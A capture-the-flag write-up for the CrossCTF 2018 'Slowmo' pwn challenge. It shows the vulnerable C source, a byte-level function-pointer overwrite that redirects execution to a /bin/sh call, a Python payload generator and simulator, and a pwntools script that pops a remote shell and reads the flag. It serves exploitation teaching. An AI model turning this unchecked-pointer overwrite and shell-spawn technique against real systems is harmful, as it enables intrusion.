CrossCTF_2018: Slowmo

Category: Pwn
Points: 444

Description:

What is in this mysterious package?

nc ctf.pwn.sg 4005

Creator - amon (@nn_amon)

Write-up

This challenge is fairly basic, with a small puzzle in using the tape instructions to rewrite a function pointer byte by byte.

It is even nicer that the source code is provided, so we can see the win condition straight away: the program calls through the global pointer indirection, which is initialised to dis (runs /bin/date), and we need to overwrite it with the address of dos (runs /bin/sh) before sending '!'.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>

int happy = 0;

void (*indirection)();   /* the target: points at dis() until we change it */

char tape[256];          /* 256-byte work area; ptr is never bounds-checked */

void dis() {
    system("/bin/date");
}

void dos() {             /* win condition: a shell */
    system("/bin/sh");
}

int main() {
    indirection = dis;
    char * ptr = tape + 128;   /* start in the middle of the tape */
    alarm(30);
    char inst;
    while (1) {
        if (happy) {
            for (int i = 0; i < 256; i++) {
                printf("/%02x", tape[i]);
            }
            printf("/\n");
        }
        read(0, &inst, 1);
        switch (inst) {
            case '<':           /* note the swap: '<' moves ptr UP ... */
                ++ptr;
                break;
            case '>':           /* ... and '>' moves it DOWN */
                --ptr;
                break;
            case '^':           /* single-byte increment, wraps at 0xff */
                *ptr += 1;
                break;
            case 'v':           /* single-byte decrement */
                *ptr -= 1;
                break;
            case '!':           /* call through the (now corrupted) pointer */
                indirection();
                return 0;
            case '`':           /* dump the whole tape on every iteration */
                happy = 1;
        }
    }
}

The key to solving this challenge is knowing exactly how far to move the pointer and how much to add. indirection starts out holding the address of dis, and in this binary dis lives at 0x105b4 and dos at 0x105d0, a difference of 0x1c, or 28, which only changes the lowest byte of the address. ptr starts at tape + 128 and nothing checks its range, so 128 '<' instructions (which, despite the symbol, increment ptr) run it off the end of the array onto the byte directly after it, which on this binary is the low byte of indirection. 28 '^' instructions then bump that byte from 0xb4 to 0xd0, and '!' calls dos(). Two things make this work with a single byte: the target is little-endian, so the low byte comes first, and 0xb4 + 0x1c does not wrap past 0xff. If the two addresses differed in more than the low byte, the pointer would have to be walked to the higher bytes as well and each one adjusted on its own.
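To check the byte arithmetic before touching the remote service, here is a small payload generator and reference model of the tape machine. This is an added example, not code from the write-up: it assumes a 32-bit little-endian function pointer stored in the four bytes directly after tape[] (which is what the 128 '<' in the solve script rely on), and it generalises the trick to targets that differ from the current address in more than the low byte by walking to each differing byte in turn.

```python
"""Payload generator and reference simulator for the Slowmo tape machine.

Added example, not part of the original write-up. Assumptions taken from
the source and the working solve script: a 256-byte tape, ptr starting at
tape + 128, and `indirection` stored as a 32-bit little-endian pointer in
the 4 bytes directly after the tape (tape + 256 .. tape + 259).
"""
import struct

TAPE_LEN = 256          # char tape[256]
START_OFF = 128         # char *ptr = tape + 128
INDIRECTION_OFF = 256   # assumed: indirection sits right after tape[] in .bss
PTR_SIZE = 4            # assumed: 32-bit function pointer


def byte_delta(cur: int, want: int) -> str:
    """Shortest run of '^' (+1) or 'v' (-1) turning byte cur into byte want.

    `*ptr += 1` operates on a char, so arithmetic wraps modulo 256 and each
    byte can be patched independently: no carry ever reaches its neighbour.
    """
    up = (want - cur) % 256
    down = (cur - want) % 256
    return "^" * up if up <= down else "v" * down


def build_payload(cur_addr: int, target_addr: int) -> str:
    """Tape program that rewrites indirection from cur_addr to target_addr.

    Walks the pointer to every differing byte of the stored address and
    patches it in place, then fires '!'. For the write-up's addresses this
    produces exactly '<' * 128 + '^' * 28 + '!'; for addresses that differ
    in more than the low byte it keeps walking to the higher bytes.
    """
    cur = struct.pack("<I", cur_addr)
    want = struct.pack("<I", target_addr)
    ops = []
    pos = START_OFF
    for i in range(PTR_SIZE):
        if cur[i] == want[i]:
            continue
        dest = INDIRECTION_OFF + i
        # Note the swapped cases in main(): '<' is ++ptr and '>' is --ptr.
        ops.append("<" * (dest - pos) if dest >= pos else ">" * (pos - dest))
        pos = dest
        ops.append(byte_delta(cur[i], want[i]))
    ops.append("!")  # indirection() -> dos() -> /bin/sh
    return "".join(ops)


def run_tape(program: str, indirection: int) -> int:
    """Reference model of main()'s loop.

    Memory is the tape followed by the pointer bytes; returns the value of
    indirection at the moment '!' is executed (or when the program ends).
    Raises IndexError if ptr leaves the modelled region, which is where the
    real binary would fault.
    """
    mem = bytearray(TAPE_LEN) + bytearray(struct.pack("<I", indirection))
    ptr = START_OFF

    def cell() -> int:
        if not 0 <= ptr < len(mem):
            raise IndexError(f"ptr out of modelled memory: {ptr}")
        return ptr

    for inst in program:
        if inst == "<":
            ptr += 1
        elif inst == ">":
            ptr -= 1
        elif inst == "^":
            mem[cell()] = (mem[cell()] + 1) & 0xFF
        elif inst == "v":
            mem[cell()] = (mem[cell()] - 1) & 0xFF
        elif inst == "!":
            break
        # '`' only toggles the tape dump; any other byte is ignored
    return struct.unpack_from("<I", mem, INDIRECTION_OFF)[0]


if __name__ == "__main__":
    DIS, DOS = 0x105B4, 0x105D0   # addresses quoted in the write-up
    payload = build_payload(DIS, DOS)
    print(payload)
    print(hex(run_tape(payload, DIS)))  # 0x105d0
```

For the write-up's addresses the generator emits exactly 128 '<', 28 '^' and '!', and feeding that into run_tape() confirms indirection ends up as 0x105d0 with the tape itself untouched. Because each byte is adjusted modulo 256, a target whose higher bytes also differ simply costs a few more '<' and the shorter of the '^'/'v' runs per byte.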

#!/usr/bin/env python3
from pwn import *

with context.local(log_level="critical"):
    t = remote("ctf.pwn.sg", 4005)
    # 128 x '<' walks ptr from tape+128 onto the low byte of indirection,
    # 28 x '^' turns 0xb4 (dis) into 0xd0 (dos) and '!' calls through it.
    # The trailing newlines match no case in the switch and are ignored.
    t.send(b"<" * 128 + b"^" * 28 + b"!" + b"\n" * 5)

# indirection() is now dos(): we have a shell on the other end
t.sendline(b"cat /home/slowmo/flag")
flag = t.clean(1).decode().strip()
log.success(f"Flag: {flag}")

t.interactive()

Running it gives us:

root@ctf:~# ./solve.py 
[+] Flag: CrossCTF{l1sten_cl0s3_and_d0nt_b33_st00nes}
[*] Switching to interactive mode
$

Therefore, the flag is CrossCTF{l1sten_cl0s3_and_d0nt_b33_st00nes}
